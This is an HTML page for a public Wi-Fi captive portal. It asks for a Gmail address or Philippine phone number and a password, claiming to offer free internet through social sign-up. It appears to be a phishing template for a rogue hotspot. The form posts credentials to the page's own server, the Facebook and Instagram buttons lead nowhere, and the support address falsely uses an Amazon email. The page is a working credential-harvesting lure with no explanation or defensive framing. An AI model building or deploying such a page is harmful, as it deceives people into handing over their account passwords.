<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Wi-Fi Login</title>
<link rel="stylesheet" href="static/css/styles.css">
</head>
<body>
<div class="login-container">
  <h1>Welcome to Free Captive Wi-Fi</h1>
  <p class="description">
    Connect with us and enjoy high-speed internet access. You can sign up for free using your existing Facebook or Instagram account. Please choose one of the social login options below to access exclusive content.
  </p>
  <form class="login-form" method="post">
    <input type="text" name="login" id="username" placeholder="Phone or Email" required 
pattern="(\+63[0-9]{10}|09[0-9]{9}|.+@gmail\.com)" title="Please enter your valid Gmail account (e.g., user@gmail.com) or a Philippine mobile number (e.g., +639551374208 or 09551374208)">
    <input type="password" name="password" id="password" placeholder="Password" required>
    <label for="show-password">
      <input type="checkbox" id="show-password"> Show Password
    </label>
    <button type="submit">Sign up</button>
  </form>
  <div class="social-login">
    <p>Sign up using facebook or instagram account</p>
    <a href="#" class="facebook-btn">
      <img src="static/img/facebook.png" alt="Facebook logo">
      Facebook
    </a>
    <a href="#" class="instagram-btn">
      <img src="static/img/instagram.png" alt="Instagram logo">
      Instagram
    </a>
  </div>
<p class="help-text">
  Need help? Contact us at <a href="mailto:marketing@amazon.com">marketing@amazon.com</a> for assistance.
</p>
</div>
<!-- JavaScript to handle the "Show Password" functionality -->
<script>
document.addEventListener('DOMContentLoaded', function () {
  var showPasswordCheckbox = document.getElementById('show-password');
  var passwordInput = document.getElementById('password');
  
  showPasswordCheckbox.addEventListener('change', function (e) {
    if (showPasswordCheckbox.checked) {
      passwordInput.type = 'text';
    } else {
      passwordInput.type = 'password';
    }
  });
});
</script>
</body>
</html>
